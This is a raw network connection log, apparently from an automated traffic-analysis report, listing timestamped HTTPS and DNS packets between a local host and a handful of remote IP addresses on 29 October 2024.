                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045821905 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045864105 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045864105 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045876026 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045928001 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.045933008 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.046225071 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.046262026 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.046272993 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.046278000 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.046315908 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.046325922 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.047110081 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.047147036 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.047156096 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.047171116 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.047175884 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.047204018 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.075261116 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.075294018 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.075367928 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.075625896 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.075633049 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.088994026 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.089081049 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.089088917 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.143522024 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.167721033 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.167737007 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.167788029 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.167833090 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.167849064 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.167880058 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.167898893 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.168344021 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.168351889 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.168411016 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.168741941 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.168749094 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.168802023 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.169073105 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.169133902 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.169753075 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.169816971 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.211524963 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.211587906 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.211620092 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.211653948 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.211669922 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.211719990 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.290040970 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.290142059 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.290163994 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.290191889 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.290210009 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.290249109 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.290637970 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.290710926 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.291196108 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.291264057 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.291608095 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.291656017 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.333842993 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.334027052 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.334074974 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.334125042 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.334316015 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.334364891 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.412442923 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.412506104 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.412607908 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.412636995 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.412652016 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.412676096 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.412702084 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.412707090 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.413157940 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.413203001 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.413208008 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.413243055 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.413433075 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.413506985 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.456382990 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.456448078 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.456501961 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.456527948 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.456543922 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.456604958 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.456655025 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.456660986 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.456703901 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.512764931 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.513180971 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.513206005 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.514261961 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.514357090 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.515546083 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.515621901 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.515752077 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.515770912 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.534837008 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.534895897 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.534924030 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.534941912 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.534955978 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.534991026 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.535018921 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.535079956 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.535336018 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.535387993 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.535424948 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.535473108 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.535903931 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.535969019 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.557528019 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.578722954 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.578795910 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.578815937 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.578836918 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.578852892 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.578869104 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.578888893 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.578892946 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.578922033 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.620512962 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.657116890 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.657176971 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.657279015 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.657290936 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.657344103 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.657419920 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.657476902 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.658221960 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.658272982 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.658312082 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.658318996 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.658344984 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.658358097 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.691977024 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692111015 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692142963 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692179918 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692215919 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692212105 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692243099 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692270994 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692286968 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692296028 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692492008 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692533970 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.692539930 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.698765039 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.703527927 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.703543901 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.704721928 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.704804897 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.705837011 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.705920935 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.706407070 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.706413984 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.706440926 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.729926109 CET4996853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.735388041 CET53499681.1.1.1192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.735447884 CET4996853192.168.2.161.1.1.1
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.746479988 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.746494055 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.746526957 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.746535063 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.778960943 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.778981924 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.779086113 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.779100895 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.779139996 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.779876947 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.779896021 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.779958963 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.779968023 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.779998064 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.780018091 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.794516087 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809228897 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809345007 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809381962 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809411049 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809432030 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809525013 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809684992 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809807062 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809858084 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.809988976 CET49965443192.168.2.16104.16.79.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.810003042 CET44349965104.16.79.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823281050 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823327065 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823384047 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823528051 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823534966 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.823678017 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.824716091 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.824750900 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.824868917 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.825087070 CET49972443192.168.2.16104.16.80.73
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.825098991 CET44349972104.16.80.73192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.829824924 CET49973443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.829834938 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.829919100 CET49973443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.830184937 CET49973443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.830204964 CET44349973104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.874696970 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.875014067 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.875060081 CET4434996634.49.241.189192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.875125885 CET49966443192.168.2.1634.49.241.189
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.917320967 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.917350054 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.917514086 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.917532921 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.917578936 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.945235014 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.945262909 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.945421934 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.945447922 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:36.945493937 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.039264917 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.039297104 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.039490938 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.039511919 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.039562941 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.040297031 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.040321112 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.040376902 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.040385008 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.040395975 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.040431023 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.067677975 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.067709923 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.067779064 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.067792892 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.067828894 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.067852974 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.161624908 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.161670923 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.161744118 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.161770105 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.161793947 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.161811113 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.162974119 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.162997007 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.163043976 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.163049936 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.163086891 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.163094044 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.190589905 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.190619946 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.190781116 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.190797091 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.190845013 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.191010952 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.191065073 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.191071033 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.191108942 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.191128969 CET44349963104.18.66.57192.168.2.16
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.191169977 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.191195011 CET49963443192.168.2.16104.18.66.57
                                                                                                                                                                                                                                                                  Oct 29, 2024 20:11:37.191209078 CET44349963104.18.66.57192.168.2.16
